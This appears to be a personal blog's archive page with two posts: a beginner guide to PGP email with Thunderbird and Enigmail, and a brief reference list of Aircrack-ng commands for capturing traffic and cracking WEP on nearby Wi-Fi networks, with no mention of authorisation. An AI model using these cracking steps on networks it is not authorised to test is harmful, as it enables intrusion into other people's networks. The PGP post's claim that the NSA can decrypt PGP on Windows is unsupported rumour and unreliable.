Monthly Archives: August 2015

PGP with Thunderbird and Enigmail

PGP is a technique that you put encrypted mail content in a standard mail body, like Gmail and Hotmail, by using that technique, you can assure that only the intended recipient can receive and decrypt the mail.

The software we will use is Enigmail and Thunderbird. These two software is available for Mac, Linux and Windows.

PS. For Windows, there are some humor that NSA can decrypt the cipher in Windows, so it MAY not be safe to use PGP in Windows. As I am just a normal user, so no big deal at all.

1. Install Enigmail and Thunderbird (I use Ubuntu, not a big deal for the installation method)

sudo apt-get install enigmail thunderbird

2. Open Thunderbird, add your standard gmail account

If you are using Gmail, you may need to enable the “Less secured logon”, because Gmail has block you from using the classic mail client like Outlook and Thunderbird.

pgp1

3. Configure Enigmail and Generate the key

You may use Thunderbird, there is a Enigmail menu, Setup Wizard

pgp2

pgp3

pgp4

4. After you generate the key, we can send a PGP encrypted email. I have configured two email with PGP and play around with it.

pgp5

5. After I send out the mail, the mail body is encrypted, but not the Mail Subject (**** IMPORTANT ****). When I click on the sent mail, I don’t even able to retrieve the mail content as it is already encrypted with the recipient public key

pgp6

6. On the recipient side, we need to provide password to decrypt the mail body.

pgp8

7. If we look at the Web, The content is being encrypted.

pgp7

8. Finally, you should submit your public key to some public repository, so that other can send u encrypted email.

You may use the export function of Enigmail, publish your public key to key server and every one in the world can send you secured mail.

Aircrack-ng for WEP

There are more than enough Aircrack-ng tutorial on the web. I just put down the command to use for later reference here

Start wlan0 monitor mode

root@kali:~# airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 2188 dhclient
 2287 NetworkManager
 3152 wpa_supplicant
 3177 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n
		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)


root@kali:~# 

Looking at which WIFI in your area

root@kali:~# airodump-ng wlan0mon

RESULT NOT SHOWN HERE, IT EXPOSES MY LOCATION INFORMATION

Mark down the BSSID, Channel and ESSID, in particular, only WEP can be cracked.

airodump-ng --channel  --bssid 00:09:5B:D7:43:A8 --write  

You will get a bunch of files, we are only interested in the “cap” file

sudo aircrack-ng .cap

DONE….